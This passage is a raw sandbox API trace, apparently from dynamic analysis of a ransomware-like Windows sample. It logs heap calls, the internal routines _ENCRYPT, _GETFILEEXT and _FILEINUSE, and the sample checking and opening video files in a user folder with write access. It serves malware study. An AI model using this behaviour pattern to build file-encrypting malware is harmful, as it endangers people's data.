[0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0043.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0043.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0043.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0043.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.035] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0043.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0043.035] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0043.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0043.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.036] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0043.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0043.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0043.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.037] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0043.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c880 [0043.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c880, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0043.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.037] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0043.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0043.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0043.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.037] CloseHandle (hObject=0x128) returned 1 [0043.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0043.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0043.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0043.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.037] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.038] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.038] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.038] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0043.038] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.038] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0043.038] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0043.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.039] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.039] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.039] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.039] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\g 0Qi.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa225b500, ftCreationTime.dwHighDateTime=0x1d5b8b1, ftLastAccessTime.dwLowDateTime=0xb5a64740, ftLastAccessTime.dwHighDateTime=0x1d5b93b, ftLastWriteTime.dwLowDateTime=0xb5a64740, ftLastWriteTime.dwHighDateTime=0x1d5b93b, nFileSizeHigh=0x0, nFileSizeLow=0xa6e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="g 0Qi.mkv", cAlternateFileName="G0QI~1.MKV")) returned 0x7c20c0 [0043.039] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.039] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.039] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\g 0Qi.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa225b500, ftCreationTime.dwHighDateTime=0x1d5b8b1, ftLastAccessTime.dwLowDateTime=0xb5a64740, ftLastAccessTime.dwHighDateTime=0x1d5b93b, ftLastWriteTime.dwLowDateTime=0xb5a64740, ftLastWriteTime.dwHighDateTime=0x1d5b93b, nFileSizeHigh=0x0, nFileSizeLow=0xa6e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="g 0Qi.mkv", cAlternateFileName="G0QI~1.MKV")) returned 0x7c20c0 [0043.039] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.039] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.039] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.039] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.039] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.040] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.040] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.040] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0043.040] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.040] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0043.040] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.040] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\h1ibodoxi-.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.040] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.040] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0043.040] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.040] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.040] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0043.040] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0043.041] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0043.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.041] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9117ea0, ftCreationTime.dwHighDateTime=0x1d5bdcf, ftLastAccessTime.dwLowDateTime=0x86c483b0, ftLastAccessTime.dwHighDateTime=0x1d5c557, ftLastWriteTime.dwLowDateTime=0x86c483b0, ftLastWriteTime.dwHighDateTime=0x1d5c557, nFileSizeHigh=0x0, nFileSizeLow=0x108fc, dwReserved0=0x0, dwReserved1=0x777648, cFileName="H1IbodoXI-.flv", cAlternateFileName="H1IBOD~1.FLV")) returned 0x7c20c0 [0043.041] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.041] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9117ea0, ftCreationTime.dwHighDateTime=0x1d5bdcf, ftLastAccessTime.dwLowDateTime=0x86c483b0, ftLastAccessTime.dwHighDateTime=0x1d5c557, ftLastWriteTime.dwLowDateTime=0x86c483b0, ftLastWriteTime.dwHighDateTime=0x1d5c557, nFileSizeHigh=0x0, nFileSizeLow=0x108fc, dwReserved0=0x0, dwReserved1=0x777648, cFileName="H1IbodoXI-.flv", cAlternateFileName="H1IBOD~1.FLV")) returned 0x7c20c0 [0043.041] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS 